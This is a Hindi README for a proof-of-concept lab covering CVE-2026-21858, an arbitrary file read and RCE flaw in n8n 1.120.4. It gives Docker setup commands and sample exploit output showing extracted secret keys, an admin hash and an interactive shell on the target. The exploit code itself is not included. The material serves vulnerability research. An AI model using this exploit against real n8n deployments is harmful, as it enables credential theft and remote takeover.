
CVE-2026-21858 के लिए Docker-आधारित PoC वातावरण और exploit स्क्रिप्ट, जो n8n 1.120.4 की मनमानी फ़ाइल पढ़ने और RCE दोष है, जो secret extraction और एक interactive shell प्रदान करता है।
n8n 1.120.4 के लिए PoC वातावरण, जिसमें एक Form Trigger वर्कफ़्लो और एक exploit स्क्रिप्ट शामिल है।
Dockerfile — n8n vulnerable वातावरण बनाएँrun.bat — कंटेनर चलाएँ (Windows)workflow.txt — n8n वर्कफ़्लो (Form Trigger सहित)poc.py — PoC स्क्रिप्टrequirements.txt — PoC निर्भरताएँdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txt पेस्ट करेंpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, admin identifiers) निकालता है।n8n-shell>) प्रदान किया जाता है।id) लक्ष्य वातावरण से आउटपुट मिलता है (RCE)।[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
हम महीने में एक बार CVE और malware विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक को फ़ॉलो करें।